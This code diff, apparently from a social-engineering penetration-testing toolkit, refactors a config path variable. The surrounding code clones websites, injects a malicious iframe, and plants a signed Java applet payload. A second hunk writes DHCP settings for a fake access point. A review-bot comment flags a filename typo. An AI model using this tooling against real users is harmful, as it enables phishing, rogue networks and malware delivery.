setdir + "/web_clone/index.html.bak", setdir + "/web_clone/index.html.new") userconfigpath + "web_clone/index.html.bak", userconfigpath + "web_clone/index.html.new")
if os.path.isfile(setdir + "/web_clone/index.html.new"): if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
shutil.copyfile( shutil.copyfile(
setdir + "/web_clone/index.html.new", setdir + "/web_clone/index.html") userconfigpath + "web_clone/index.html.new", userconfigpath + "web_clone/index.html")
time.sleep(1) time.sleep(1)
fileopen = open(setdir + "/web_clone/index.html", "r").readlines() fileopen = open(userconfigpath + "web_clone/index.html", "r").readlines()
filewrite = open(setdir + "/web_clone/index.html.new", "w") filewrite = open(userconfigpath + "web_clone/index.html.new", "w")
counter = 0 counter = 0
for line in fileopen: for line in fileopen:
counter = 0 counter = 0
@ -449,13 +449,13 @@ try:
bcolors.BLUE + "[*] Malicious iframe injection successful...crafting payload.\n" + bcolors.ENDC)) bcolors.BLUE + "[*] Malicious iframe injection successful...crafting payload.\n" + bcolors.ENDC))
if attack_vector == "java" or attack_vector == "browser" or attack_vector == "multiattack": if attack_vector == "java" or attack_vector == "browser" or attack_vector == "multiattack":
if not os.path.isfile(setdir + "/web_clone/%s" % (rand_gen_applet)): if not os.path.isfile(userconfigpath + "web_clone/%s" % (rand_gen_applet)):
shutil.copyfile("src/html/Signed_Update.jar.orig", shutil.copyfile("src/html/Signed_Update.jar.orig",
setdir + "/web_clone/%s" % (rand_gen_applet)) userconfigpath + "web_clone/%s" % (rand_gen_applet))
# move index.html to our main website # move index.html to our main website
if os.path.isfile(setdir + "/web_clone/index.html.new"): if os.path.isfile(userconfigpath + "web_clone/index.html.new"):
shutil.move(setdir + "/web_clone/index.html.new", shutil.move(userconfigpath + "web_clone/index.html.new",
setdir + "/web_clone/index.html") userconfigpath + "web_clone/index.html")
# catch keyboard control-c # catch keyboard control-c
except KeyboardInterrupt: except KeyboardInterrupt:
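Review bot: The two `os.path.isfile(userconfigpath + "proxy.confg")` checks in the proxy block test a differently spelled name than the `open(userconfigpath + "proxy.config", "r")` between them, so unless a file literally named `proxy.confg` exists the configured proxy is never read and `proxy_config` always falls back to `"ls"`; the commit rewrote these three lines without resolving the mismatch. Presumably `proxy.config` is the intended name on all three — confirm against whatever writes that file. The `site_cloned == True` and `unc_embed == True` comparisons in the touched lines would read better as `if site_cloned:` and `if unc_embed:`. The `try` block enclosing these hunks begins and ends outside the view.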


@ -92,14 +92,14 @@ else:
if fakeap_dhcp_menu_choice == "1": if fakeap_dhcp_menu_choice == "1":
# writes the dhcp server out # writes the dhcp server out
core.print_status("Writing the dhcp configuration file to ~/.set") core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.setdir + "dhcp.conf"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config1) filewrite.write(dhcp_config1)
dhcptun = 1 dhcptun = 1
if fakeap_dhcp_menu_choice == "2": if fakeap_dhcp_menu_choice == "2":
# writes the dhcp server out # writes the dhcp server out
core.print_status("Writing the dhcp configuration file to ~/.set") core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.setdir + "dhcp.conf"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config2) filewrite.write(dhcp_config2)
dhcptun = 2 dhcptun = 2